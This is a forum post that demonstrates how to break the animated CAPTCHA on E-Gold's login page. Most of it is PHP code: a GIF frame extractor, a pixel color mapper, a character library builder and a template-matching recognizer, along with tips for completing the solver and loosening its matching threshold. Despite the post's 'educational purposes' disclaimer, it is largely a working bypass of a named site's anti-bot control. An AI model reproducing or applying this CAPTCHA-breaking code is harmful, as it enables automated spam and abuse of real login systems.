Here's how to crack a 4D (4th dimension) CAPTCHA like E-Gold

Posted: Mon Jan 05, 2009 3:22 pm
by kaisellgren
Hello everybody!

Today I'll share some tips about OCR. I'll talk about the CAPTCHA of E-Gold. The CAPTCHA can be found at http://www.e-gold.com, more precisely at https://www.e-gold.com/acct/login.html

I have built my own OCR tool as a single file, EGOCR.php, which takes a GET argument and outputs the final result. It seems to work with a success rate of around 90-95%. I am not providing the full source for the OCR tool, but rather some sample code snippets and theories.

Here's an example of what the CAPTCHA looks like:
Image

This topic is not meant to harm E-Gold, and I am only providing the theories and techniques here - not a full script that does everything for you. If you are trying to harm the E-Gold website, you are solely responsible for your actions. This information is provided for educational purposes only.

Let me first tell you something about CAPTCHAs. They are meant to tell what type of user they are dealing with (a bot or a human). They do not prevent spamming completely (manual human spammers still get through). They add a little extra load on the servers, but they effectively reduce the amount of spam you receive. The Internet is full of different CAPTCHAs. The general idea behind a good CAPTCHA is to take advantage of what the human mind does well. There are 2D (2nd dimension) and 3D (3rd dimension) CAPTCHAs, both of which are good. However, a common misconception is that 4D (4th dimension) CAPTCHAs, where the image also changes over time as an animation, are good too. They provide no additional security. Today I will show you how ridiculously weak the 4D CAPTCHA used on E-Gold's website is.

There is no ultimate OCR tool that works on all CAPTCHAs, so each one needs a tool of its own. We will split this OCR tool into the following parts:
- GIF Decoder
- CCMap
- LibMaker
- OCR

GIF Decoder
First thing we need to do is to extract all frames of our CAPTCHA.

Here's our decoder class (from http://www.phpclasses.org/browse/package/3163.html):

Code: Select all

Class GIFDecoder {
    var $GIF_buffer = Array ( );
    var $GIF_arrays = Array ( );
    var $GIF_delays = Array ( );
    var $GIF_stream = "";
    var $GIF_string = "";
    var $GIF_bfseek =  0;
 
    var $GIF_screen = Array ( );
    var $GIF_global = Array ( );
    var $GIF_sorted;
    var $GIF_colorS;
    var $GIF_colorC;
    var $GIF_colorF;
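    // PHP 5+ constructor name; PHP 8 no longer treats a method named after the class as the constructor
    function __construct ( $GIF_pointer ) {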
        $this->GIF_stream = $GIF_pointer;
 
        GIFDecoder::GIFGetByte ( 6 );    // GIF89a
        GIFDecoder::GIFGetByte ( 7 );    // Logical Screen Descriptor
 
        $this->GIF_screen = $this->GIF_buffer;
        $this->GIF_colorF = $this->GIF_buffer [ 4 ] & 0x80 ? 1 : 0;
        $this->GIF_sorted = $this->GIF_buffer [ 4 ] & 0x08 ? 1 : 0;
        $this->GIF_colorC = $this->GIF_buffer [ 4 ] & 0x07;
        $this->GIF_colorS = 2 << $this->GIF_colorC;
 
        if ( $this->GIF_colorF == 1 ) {
            GIFDecoder::GIFGetByte ( 3 * $this->GIF_colorS );
            $this->GIF_global = $this->GIF_buffer;
        }
        for ( $cycle = 1; $cycle; ) {
            if ( GIFDecoder::GIFGetByte ( 1 ) ) {
                switch ( $this->GIF_buffer [ 0 ] ) {
                    case 0x21:
                        GIFDecoder::GIFReadExtensions ( );
                        break;
                    case 0x2C:
                        GIFDecoder::GIFReadDescriptor ( );
                        break;
                    case 0x3B:
                        $cycle = 0;
                        break;
                }
            }
            else {
                $cycle = 0;
            }
        }
    }
    function GIFReadExtensions ( ) {
        GIFDecoder::GIFGetByte ( 1 );
        for ( ; ; ) {
            GIFDecoder::GIFGetByte ( 1 );
            if ( ( $u = $this->GIF_buffer [ 0 ] ) == 0x00 ) {
                break;
            }
            GIFDecoder::GIFGetByte ( $u );
 
            if ( $u == 4 ) {
                $this->GIF_delays [ ] = ( $this->GIF_buffer [ 1 ] | $this->GIF_buffer [ 2 ] << 8 );
            }
        }
    }
    function GIFReadDescriptor ( ) {
        $GIF_screen    = Array ( );
 
        GIFDecoder::GIFGetByte ( 9 );
        $GIF_screen = $this->GIF_buffer;
        $GIF_colorF = $this->GIF_buffer [ 8 ] & 0x80 ? 1 : 0;
        if ( $GIF_colorF ) {
            $GIF_code = $this->GIF_buffer [ 8 ] & 0x07;
            $GIF_sort = $this->GIF_buffer [ 8 ] & 0x20 ? 1 : 0;
        }
        else {
            $GIF_code = $this->GIF_colorC;
            $GIF_sort = $this->GIF_sorted;
        }
        $GIF_size = 2 << $GIF_code;
        $this->GIF_screen [ 4 ] &= 0x70;
        $this->GIF_screen [ 4 ] |= 0x80;
        $this->GIF_screen [ 4 ] |= $GIF_code;
        if ( $GIF_sort ) {
            $this->GIF_screen [ 4 ] |= 0x08;
        }
        $this->GIF_string = "GIF87a";
        GIFDecoder::GIFPutByte ( $this->GIF_screen );
        if ( $GIF_colorF == 1 ) {
            GIFDecoder::GIFGetByte ( 3 * $GIF_size );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        }
        else {
            GIFDecoder::GIFPutByte ( $this->GIF_global );
        }
        $this->GIF_string .= chr ( 0x2C );
        $GIF_screen [ 8 ] &= 0x40;
        GIFDecoder::GIFPutByte ( $GIF_screen );
        GIFDecoder::GIFGetByte ( 1 );
        GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        for ( ; ; ) {
            GIFDecoder::GIFGetByte ( 1 );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
            if ( ( $u = $this->GIF_buffer [ 0 ] ) == 0x00 ) {
                break;
            }
            GIFDecoder::GIFGetByte ( $u );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        }
        $this->GIF_string .= chr ( 0x3B );
        /*
           Add the rebuilt single-frame GIF to the $GIF_arrays list...
        */
        $this->GIF_arrays [ ] = $this->GIF_string;
    }
 
    function GIFGetByte ( $len ) {
        $this->GIF_buffer = Array ( );
 
        for ( $i = 0; $i < $len; $i++ ) {
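            // Stop at the end of the stream (valid offsets run from 0 to length - 1)
            if ( $this->GIF_bfseek >= strlen ( $this->GIF_stream ) ) {
                return 0;
            }
            // Square brackets here: the { } string offset syntax was removed in PHP 8
            $this->GIF_buffer [ ] = ord ( $this->GIF_stream [ $this->GIF_bfseek++ ] );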
        }
        return 1;
    }
 
    function GIFPutByte ( $bytes ) {
        for ( $i = 0; $i < count ( $bytes ); $i++ ) {
            $this->GIF_string .= chr ( $bytes [ $i ] );
        }
    }
 
    function GIFGetFrames ( ) {
        return ( $this->GIF_arrays );
    }
 
    function GIFGetDelays ( ) {
        return ( $this->GIF_delays );
    }
}
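The bit arithmetic in the constructor is easier to follow in isolation. Here is a minimal sketch of how the fifth byte of the Logical Screen Descriptor (`$this->GIF_buffer [ 4 ]`) is split up. The function name describePackedByte is made up for illustration and is not part of the GIFDecoder class.

```php
<?php
// Hypothetical helper, not part of GIFDecoder: splits the packed byte of a
// GIF Logical Screen Descriptor using the same masks as the constructor.
function describePackedByte(int $packed): array
{
    $sizeCode = $packed & 0x07;                          // low 3 bits: color table size code
    return [
        'has_global_table' => ($packed & 0x80) ? 1 : 0,  // top bit: global color table present
        'sorted'           => ($packed & 0x08) ? 1 : 0,  // sort flag
        'size_code'        => $sizeCode,
        'color_count'      => 2 << $sizeCode,            // 2^(code + 1) palette entries
        'table_bytes'      => 3 * (2 << $sizeCode),      // 3 bytes (R, G, B) per entry
    ];
}

print_r(describePackedByte(0xF7));
```

For 0xF7 this reports a global color table with 256 entries, which is why the constructor then reads 3 * 256 = 768 bytes before it starts looking for frames.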
And we run it on our CAPTCHA from E-Gold (downloaded, fetched with cURL, whatever) like this:

Code: Select all

$image_to_break = 'gen3.gif'; // the CAPTCHA image file
$gif_data = file_get_contents($image_to_break); // read the whole file as a binary string
$decoder = new GIFDecoder($gif_data);
$frames = $decoder->GIFGetFrames();
foreach ($frames as $i => $frame) {
    // Zero-padded names: frame00.gif, frame01.gif, ...
    $fname = sprintf('frame%02d.gif', $i);
    file_put_contents($fname, $frame);
}
Now we should have all the frames extracted as frame00.gif, ..., frameN.gif

CCMap
CCMap stands for Character Color Map. It's a tool that is sometimes, though not always, used in OCRing. Probably every OCRer has their own way of doing this, but here's my script:

Code: Select all

<?php
 
$im = imagecreatefromgif('frame09.gif');
// Build a CSS color such as #0A00FF; each channel is zero-padded to two hex digits
function rgbhex($red,$green,$blue)
 {
  return sprintf('#%02X%02X%02X',$red,$green,$blue);
 }
 
$width=121; // Since it's constant, no dynamic dimension loading needed
$height=25;
echo '<body style="margin: 0px; background-color: #000;"><div style="font-family: Courier New; width: 8000px;">';
// Header row: the X coordinate of every column
for ($x = 0;$x < $width;$x++)
   {
    $xxx = str_pad($x,3,'0',STR_PAD_LEFT);
    echo '<div style="color: #ffffff; display: inline;">'.$xxx.' </div>';
   }
  echo '<br />';
for ($y = 0;$y < $height;$y++)
 {
  for ($x = 0;$x < $width;$x++)
   {
    // For a palette image such as a GIF frame, this is a palette index, not an RGB value
    $color = imagecolorat($im,$x,$y);
    // Look up the real color behind that index
    $rgb = imagecolorsforindex($im,$color);
    if ($color != 1)
         echo '<div style="color: '.rgbhex($rgb['red'],$rgb['green'],$rgb['blue']).'; display: inline;">';
         else echo '<div style="color: #ffffff; display: inline;">';
    echo str_pad($color,3,'0',STR_PAD_LEFT).' </div>';
   }
  echo '<br />';
 }
echo '</div></body>';
imagedestroy($im);
 
?>
Let me explain this. This script is a tool that quickly shows you how the characters are built up in the colorspace. If you run it on any E-Gold frame, you get something like: http://i39.tinypic.com/2s8fjo1.png

To break the E-Gold CAPTCHA, we make a library of characters. We use this tool to see the X,Y coordinates of the characters and their structure. I will make a library entry of the character 8 from the CAPTCHA. In the picture above, our character 8 starts at X position 9 and ends at X position 24. Remember these.
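
Reading the X positions off the map by eye works, but the same bounds can also be found by scanning columns. Here is a rough sketch, assuming the frame has already been read into a 2D array of palette indexes (`$grid[$y][$x]`) and that index 1 is the character color, as in the map above. findColumnRuns is a hypothetical name, and characters that touch each other would come out as a single run.

```php
<?php
// Hypothetical helper: returns [start, end] X ranges of consecutive columns
// that contain at least one foreground pixel.
function findColumnRuns(array $grid, int $foreground = 1): array
{
    $runs = [];
    $start = null;
    $width = count($grid[0]);
    for ($x = 0; $x < $width; $x++) {
        // array_column() pulls column $x out of every row
        $hasInk = in_array($foreground, array_column($grid, $x), true);
        if ($hasInk && $start === null) {
            $start = $x;                 // a run of character columns begins here
        } elseif (!$hasInk && $start !== null) {
            $runs[] = [$start, $x - 1];  // the previous column was the last one
            $start = null;
        }
    }
    if ($start !== null) {
        $runs[] = [$start, $width - 1];  // the run reaches the right edge
    }
    return $runs;
}

// Tiny made-up grid, not real CAPTCHA data
$grid = [
    [0, 1, 1, 0, 0, 1],
    [0, 1, 0, 0, 0, 1],
];
print_r(findColumnRuns($grid)); // runs at columns 1-2 and 5-5
```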

Libmaker
Here's another tool I used for OCRing E-Gold. It turns a CCMap into "a lib". Sometimes the lib can be just an array, like the one I have here. Sometimes it is more complicated.

Code: Select all

<?php
 
$im = imagecreatefromgif('frame13.gif');
$width=121;
$height=25;
echo '$nro_8_lib = array(';
for ($y = 0;$y < $height;$y++)
 {
  for ($x = 9;$x <= 24;$x++)
   {
    $color = imagecolorat($im,$x,$y);
    echo "$color,";
   }
  echo '<br />';
 }
echo ');';
imagedestroy($im);
 
?>
The numbers 9 and 24 in the for loop are from the previous tool. The above code will output something like:
$nro_8_lib = array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,
0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
);
As you can see from the array, it has a letter '8' in it. We need this in the final OCR tool.
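
A quick way to double-check a library array is to draw it as text. Here is a small sketch that does this. renderLib is a made-up helper, and the sample array is a tiny invented shape rather than the real 16 by 25 array above.

```php
<?php
// Hypothetical helper: draws a flat 0/1 library array as rows of text,
// '#' for character pixels (1) and '.' for everything else.
function renderLib(array $lib, int $width): string
{
    $lines = [];
    foreach (array_chunk($lib, $width) as $row) {
        $line = '';
        foreach ($row as $value) {
            $line .= ($value === 1) ? '#' : '.';
        }
        $lines[] = $line;
    }
    return implode("\n", $lines);
}

// A made-up 4 x 3 sample shape
$sample = array(0,1,1,0,
                1,0,0,1,
                0,1,1,0);
echo renderLib($sample, 4), "\n";
```

With the real array you would call renderLib($nro_8_lib, 16), since the library is 16 columns wide (X positions 9 to 24).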

OCR
A basic demonstration that detects the CCMap we made a library of.

Code: Select all

<?php
 
$a = -1; // frames are numbered from frame00.gif, and $a is incremented before it is used
while (true)
 {
  $a++;
  $framename = ($a < 10) ? "frame0$a.gif" : "frame$a.gif";
  if (!file_exists($framename))
   break; // Still nothing found? Damn, didn't work..
  $im = imagecreatefromgif($framename);
  $width=121;
  $height=25;
  // Looking for the letter 8
  $nro_8_lib = array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,
0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
);
  for ($x = 8;$x <= 10;$x++) // try a few X offsets around the expected position
   {
    for ($y = 0;$y <= 2;$y++) // and a few Y offsets
     {
      $matched = 0;
      for ($i = 0,$ii = count($nro_8_lib);$i < $ii;$i++)
       {
        // Turn the flat index into a column/row inside the 16 pixel wide library
        $xx = $i % 16;
        $yy = (int) floor($i/16);
        $color_in_lib = $nro_8_lib[$i];
        if ($xx+$x < 121 && $yy+$y < 25)
         $color_in_img = imagecolorat($im,$xx+$x,$yy+$y);
        else
         $color_in_img = 6666; // outside the image: a value that never matches
        if ($color_in_lib == $color_in_img)
         $matched++;
       }
      if ($matched == 0)
       continue; // nothing matched, and this avoids dividing by zero below
      if (count($nro_8_lib)/$matched < 1.05)
       {
        echo 'Letter 8 was found at '.$framename.' at pixel position '.$x.','.$y.' MATCH: '.count($nro_8_lib)/$matched.'<br />';
        exit;
       }
     }
   }
  imagedestroy($im);
 }
 
?>
When I ran it against this image:
Image
It printed:
Letter 8 was found at frame13.gif at pixel position 9,0 MATCH: 1

We used our letter 8 array in the final OCR file. We would add an array for every character that E-Gold uses (1,2,3,4,5,6,7,8,9) and loop through them all. In the end, we would just collect all of the matched characters together with the X position each was found at, then sort and list them by that position to form the complete word, like 813324 in this case. Also, E-Gold rotates the characters a bit and varies their sizes slightly. You need other OCR tools, such as CRot, for those, or you could just automate everything. Or you can try changing the line

Code: Select all

if (count($nro_8_lib)/$matched < 1.05)
to something less restrictive, like 1.2 or so. This is for lazy people who don't want to spend more time and are happy with less accurate results.
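
To make the threshold concrete: the ratio is the library size divided by the number of matching pixels, so a smaller ratio means a better match and 1 means a perfect one. Here is a small sketch that works out how many pixels must match for a given threshold. minMatchesNeeded is a hypothetical helper that is not part of the OCR script.

```php
<?php
// Hypothetical helper: the smallest number of matching pixels that satisfies
// ($total / $matched < $threshold) for a library of $total pixels.
function minMatchesNeeded(int $total, float $threshold): int
{
    for ($matched = 1; $matched <= $total; $matched++) {
        if ($total / $matched < $threshold) {
            return $matched;
        }
    }
    return $total + 1; // a threshold of 1 or less can never be met
}

$total = 16 * 25; // the '8' library is 16 columns by 25 rows = 400 pixels
echo minMatchesNeeded($total, 1.05), "\n"; // 381
echo minMatchesNeeded($total, 1.2), "\n";  // 334
```

So 1.05 accepts a position only when at least 381 of the 400 pixels (about 95%) agree with the library, while 1.2 already accepts 334 of 400 (about 83%).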

The purpose of this thread is not to give you a complete OCR that you can use to spam and crack the E-Gold website. I will not provide anyone with any additional code to complete the rest. Rather, I wanted to show how weak the CAPTCHA really is.

So what are the benefits of all this? For me, nothing except the pure fun of learning and beating something. :twisted:

If you want to continue from here to finish the OCR process, go ahead. You need a few (actually a couple of) more tools to complete it. You also may want to optimize the code since the code I provided here is solely meant to defeat the CAPTCHA - not to effectively spam E-Gold as many times as possible per second.

By the way, I found two CSRF holes on E-Gold's website, and the website uses RC4 for SSL, which I don't think is the best choice for their business. They also lack an identity file, and their security advice is not very precise.

I hope E-Gold hires a new security professional. :)